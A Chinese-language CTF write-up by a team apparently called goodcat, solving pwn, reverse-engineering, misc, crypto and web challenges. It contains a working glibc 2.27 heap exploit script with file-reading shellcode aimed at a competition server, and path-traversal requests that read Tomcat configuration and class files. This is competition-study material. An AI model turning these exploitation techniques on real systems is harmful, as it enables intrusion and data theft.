本文为goodcat战队参赛wp，非官方出品

Pwn

1、 K1ng_in_h3Ap_II ?

libc2.27-0ubuntu1.4，存在明显的UAF；

tcahce double free 控制tcache struct，将counts[]数组全部填满后，将其释放到unsortedbin可泄露libc；

之后再次double free 将free_hook改为setcontext，布置好orw，之后读出flag。

from pwn import*


context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"
context.terminal = ['tmux', 'splitw', '-h']


#r = process("./pwn2")
r = remote("47.104.175.110", 61608)
libc = ELF("./libc.so.6")


def allocate(index, size):
   r.sendlineafter(">> \n", "1")
   r.sendlineafter("input index:\n", str(index))
   r.sendlineafter("input size:\n", str(size))


def delete(index):
   r.sendlineafter(">> \n", "2")
   r.sendlineafter("input index:\n", str(index))


def edit(index, content):
   r.sendlineafter(">> \n", "3")
   r.sendlineafter("input index:\n", str(index))
   r.sendafter("input context:\n", content)


def show(index):
   r.sendlineafter(">> \n", "4")
   r.sendlineafter("input index:\n", str(index))


for i in range(8):
   allocate(0, 0x10)
allocate(0, 0x40)
for i in range(7):
   allocate(0, 0x60)


allocate(0, 0x60)
delete(0)
edit(0, 'a' * 0x10)
delete(0)


show(0)
heap_addr = u64(r.recv(6) + '\x00\x00') & 0xfffffffffffff000
print "heap_addr = " + hex(heap_addr)


edit(0, p64(heap_addr+0x10))


allocate(0, 0x60)
allocate(0, 0x60)


edit(0, 'a' * 64)
delete(0)


show(0)
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
set_context = libc_base + libc.symbols['setcontext']
mprotect = libc_base + libc.sym['mprotect']
print "libc_base = " + hex(libc_base)
print "mprotect = " + hex(mprotect)
allocate(0, 0x58)


edit(0, '\x00' * 0x58)


allocate(1, 0x38)
delete(1)


edit(1, p64(free_hook))
allocate(1, 0x38)
allocate(1, 0x38)


allocate(2, 0x30)
allocate(2, 0x30)
allocate(2, 0x30)
allocate(2, 0x30)
allocate(3, 0x10)
allocate(4, 0x30)
allocate(5, 0x30)


new_addr =  free_hook &0xFFFFFFFFFFFFF000
shellcode1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000


mov eax,0
syscall


jmp rsi
''' % new_addr
edit(1, p64(set_context+53) + p64(free_hook+0x10) + asm(shellcode1))


edit(4, p64(0) + p64(new_addr) + p64(0x1000) + p64(0) + p64(0) + p64(7))
edit(5, p64(free_hook + 0x8) + p64(mprotect))




delete(2)




sleep(0.5)


shellcode2 = '''
mov rax, 0x67616c662f ;// /flag
push rax


mov rdi, rsp ;// /flag
mov rsi, 0 ;// O_RDONLY
xor rdx, rdx ;
mov rax, 2 ;// SYS_open
syscall


mov rdi, rax ;// fd
mov rsi,rsp ;
mov rdx, 1024 ;// nbytes
mov rax,0 ;// SYS_read
syscall


mov rdi, 1 ;// fd
mov rsi, rsp ;// buf
mov rdx, rax ;// count
mov rax, 1 ;// SYS_write
syscall


mov rdi, 0 ;// error_code
mov rax, 60
syscall
'''
r.sendline(asm(shellcode2))


r.interactive()

Re

1、 Just_cmp-re ?| Solved | working:

find the cmp str.

buu原题

hook原文

将原文转成qword

与加密key相加得到flag

flag{a14a424005b14e2b89ed45031ea791b9}

2、 Funny_js

根据题目名称，发现是一道js框架的题目

提取js字节码如下：

0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02, 0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02, 0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63, 0x69, 0x70, 0x68, 0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31, 0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61, 0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 0x6F, 0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61, 0x06, 0x6B, 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78, 0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75, 0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x08, 0x70, 0x75, 0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01, 0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00, 0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 0x40, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E, 0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00, 0x00, 0xCB, 0xC0, 0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4, 0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0, 0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1, 0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 0xC0, 0xB0, 0x00, 0xBF, 0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9, 0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00, 0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 0x0C, 0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00, 0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF, 0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21, 0x00, 0x00, 0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00, 0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11, 0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xC1, 0x02, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00, 0x00, 0x00, 0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00, 0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00, 0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A, 0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00, 0xBF, 0x38, 0xBF, 0x11, 0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00, 0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB, 0xEC, 0x15, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC, 0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC, 0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00, 0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00, 0x00, 0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1, 0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE, 0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF, 0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A, 0x52, 0x3F, 0x40, 0x00, 0x7C, 0x04, 0x30, 0x30, 0x2B, 0x2B, 0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A, 0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06, 0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 0x00, 0xBB, 0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00, 0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00, 0x03, 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00, 0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00, 0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01, 0xF1, 0xCB, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7, 0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C, 0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8, 0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95, 0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 0x00, 0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC, 0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01, 0x00, 0xC5, 0x06, 0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72, 0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 0xC4, 0x04, 0xCA, 0x4A, 0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00, 0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24, 0x01, 0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE, 0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30, 0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40, 0x2B, 0x3F, 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5, 0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8, 0x48, 0x7F, 0x8D, 0xAF, 0x0A, 0x00, 0x0A, 0x28, 0x01, 0xFE, 0x0A, 0x28, 0x01, 0xFE, 0x00, 0x00, 0x00

参考了这一篇博客

https://bbs.pediy.com/thread-259014.htm

对 quickjs.c 进行 patch：

得到字节码如下，对dump出来的字节码进行分析，提取出密文

[150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 6

4, 106, 103, 166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 1

07, 131, 223, 122, 229, 157]

再提取出加密过程如下：

RC4_KEY="2021quickjs_happygame"
push_i16 150
push_i16 224
push_i16 244
push_i8 68
push_i8 61
push_i8 125
push_i8 8
push_i16 239
push_i16 203
push_i16 254
push_i16 241
push_i8 113
push_i16 213
push_i16 176
push_i8 64
push_i8 106
push_i8 103
push_i16 166
push_i16 185
push_i16 159
push_i16 158
push_i16 172
push_i8 9
push_i16 213
push_i16 239
push_i8 12
push_i8 100
push_i16 185
push_i8 90
push_i16 174
push_i8 107
push_i16 131
array_from 32
push_i16 223
define_field "32"
push_i8 122
define_field "33"
push_i16 229
define_field "34"
push_i16 157 43 define_field "35"

加密过程就是一个异或(56-17)外加rc4（key为2021quickjs_happygameH）

解密得到flag为flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}

Misc

1、你这flag保熟吗

binwalk提取两张图片，分别得到一个字母数字混合的表格和一个hint.txt

password.xls

hint.txt

希尔伯格曲线取出表格中的字符，单独放到password.txt的文件中，运行脚本如下：

import base64
from hilbertcurve.hilbertcurve import HilbertCurve
array = []
password = ''
p = 8;n=2
hilbert_curve = HilbertCurve(p, n)
with open('password.txt','r',encoding='utf-16') as file:
   # a = file.readline().replace("\t", "").replace("\n", "")
   # print(a)
   for i in range(256):
       a = file.readline().replace("\t", "").replace("\n", "")
       array.append(a)
for i in range(256*256):
  [m,n] = hilbert_curve.point_from_distance(i)
   password += array[n][m]


# print(password)
import base64
temp = password
for i in range(25):
   temp = base64.b64decode(temp)
print(temp)

得到base64加密后的密文如下：

base解密得到密码

解压后发现里面是brainfuck

>+++++++++[<+++++++++++++ ? >-]>+ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ++[< ? ? ? ? ? ? ? ? ? ? ? ? +++++++++++++++++++++++++++++
 ? ?  ++++++++>-]>++[<+++++++++ ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++++ ? ? ? ? ? ? ? ? ? ? ?  +++++++++++++++++++++++++++++
 ? ?  ++++++++++++>-]>++++[<+++ ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ++++++++ ? ? ? ? ? ? ? ? ? ? ? +++++++++++++>-]>+++[<+++++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++  ++++ ? ? ? ? ? ? ? ? ? ?  +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? +>-] ?  ++++ ? ? ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ? ?  ++++ ? ? ? ? ? ? ? ? ?  +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ++++ ? ? ?  ++++ ? ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ? ? ? ?  ++++ ? ? ? ? ? ? ? ?  +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? >>+++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? +++[ ? ? ? ? ?  <+++ ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  +>-] ? ? ? ? ? ?  >++[ ? ? ? ? ? ? ?  <++++
 ? ?  +++++++++++++++++++++++++ ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? +++++++>-]>+++++++++++[< ? ? ? ? ? ? ? +++++ ? ? ?  ++++++>-]>++[<++
 ? ?  +++++++++++++++++++++++++ ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++++++++++++++++++++++++ ? ? ? ? ? ?  +>-]> ? ? ? +++++++[<++++++++
 ? ?  +++++++>-]+++++++++++++++ ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ++++++++++++++++++++++++++++ ? ? ? ? ? ? +++++ ? ? ? +++ ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ? ? ? ? ? ? ? ? ? ?  ++++ ? ? ? ? ?  +++++ ? ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ++++ ? ? ? ? ? ? ? ? ? ? ?  >>++ ? ? ? ? ? +++[< ? ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ? ? ? ? ? ? ? ? ? ? ? ?  >-]> ? ? ? ?  +++++ ? ? ? ? ? ? ? ? ? +++[<
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? +>-] ? ? ? ? ? ? ? ? ? ? ? ? ?  >+++ ? ? ? ? +++[< ? ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++>- ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ]>++ ? ? ?  +++++ ? ? ? ? ? ? ? ? ? [<+++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ++>- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ]+++ ? ? ? +++++ ? ? ? ? ? ? ? ? ? +++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? +++++++++++++++++++++++++++ ? ?  ++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ? ?  +++++++++++++++++++++++++++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? ++++++++++++++>>++[<+++++++ ? ? ++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ? ? +++++++++++++++++++++++++++++
 ? ?  +++++ ? ? ? ? ? ? ? ? ? ? ? ++++++++++>-]>+++++[<++++++ ?  ++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++ ?  +++++>-]>+++++++[<+++++++>-]>
++++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  ++++
[<+++ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?  +++++
+>-]>+++++[<+++++++++++++++++++>-]>++++[<+++++++++++++>-]>+++++[<+++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++++++[<
++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>+++++++[<+++++++++++++++++>-
]>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]>+++++++[<+++++++++++++++>-]>+++++++++[<+++++++++++++>-]>++++++[<+++++++++++++++++
>-]>+++[<+++++++++++>-]>+++++[<+++++++++++++++++++>-]>++++++++++[<++++++++++++>-]>++++++[<+++++++++++++++++>-]>+++++++[<+++++++++++++++>-]++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++>-]>+++++[<+++++++++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.>>+++
+++[<+++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>>+++[<+++++++++++++++++++++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>

然后解brainfuck可以得到

uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}

放

对应位置修改下大小写

flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}

Crypto

1、 baby_rsa

to small? leak?

https://blog.cryptohack.org/cryptoctf2020#one-line-crypto

from Crypto.Util.number import long_to_bytes
from gmpy2 import invert, is_prime
from tqdm import tqdm


primes = []


for xy in tqdm(range(500)):
   for mn in range(500):
       prime = xy**(mn+1) - (xy+1)**mn
       if prime.bit_length() > 2048: break
       if is_prime(prime):
           primes.append(prime)


c = 15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311


for i in range(len(primes)):
   for j in range(i, len(primes)):
       pq = primes[i]*primes[j]
       if len(bin(pq)[2:]) == 2048:
           try:
               d = invert(0x10001, (primes[i]-1)*(primes[j]-1))
               dec = long_to_bytes(pow(c, d, pq))
               if b"flag{" in dec:
                   print(dec)
           except ValueError:
               pass

已知((fac[0]+fac[1]+fac[2]) << 1) - 1的值，用其替代n。分解((fac[0]+fac[1]+fac[2]) << 1) - 1求其欧拉函数，进而求解出d和第二段。

import gmpy2
from Crypto.Util.number import *




def main():
   _n = 39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557011554851873068389016629085963086136116425352535902598378739
   e = 0x10001
   c = 40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083
   phi_n = (191 - 1) * (193 - 1) * (627383 - 1) * (1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491 - 1)
   d = gmpy2.invert(e, phi_n)
   m = pow(c % _n, d, _n)
   print(long_to_bytes(m))




if __name__ == '__main__':
   main()

###

Web

1、java_url

一道Java_URL。

Tomcat/8.5.71

http://eci-2zeb5ty7ty8rr8c0v8yy.cloudeci1.

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF//web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
        version="4.0">
  <servlet>
      <servlet-name>testurl</servlet-name>
      <servlet-class>com.test2.aaa1.testURL</servlet-class>
  </servlet>
  <servlet-mapping>
      <servlet-name>testurl</servlet-name>
      <url-pattern>/testURL</url-pattern>
  </servlet-mapping>
   
  <servlet>
      <servlet-name>download</servlet-name>
      <servlet-class>com.test2.aaa1.download</servlet-class>
  </servlet>
  <servlet-mapping>
      <servlet-name>download</servlet-name>
      <url-pattern>/download</url-pattern>
  </servlet-mapping>
</web-app>

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/testURL.class

得到class文件

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;


public class testURL extends HttpServlet {
  protected void doGet(HttpServletRequest arg1, HttpServletResponse arg2) throws ServletException, IOException {
      this.doPost(arg1, arg2);
  }


  protected void doPost(HttpServletRequest arg6, HttpServletResponse arg7) throws ServletException, IOException {
      String tartget_url = arg6.getParameter("url");
      if(tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {
          arg7.getWriter().write(String.valueOf(new StringBuilder().append("false")));
          return;
      }
      arg7.getWriter().write(String.valueOf(this.getContent(tartget_url)));
  }


  public StringBuilder getContent(String arg8) throws IOException {
      BufferedReader in = new BufferedReader(new InputStreamReader(new URL(arg8).openConnection().getInputStream()));
      StringBuilder content = new StringBuilder();
      while(true) {
          String inputLine = in.readLine();
          if(inputLine == null) {
              return content;
          }


          content.append(inputLine);
          content.append("\n");
      }


      return content;
  }
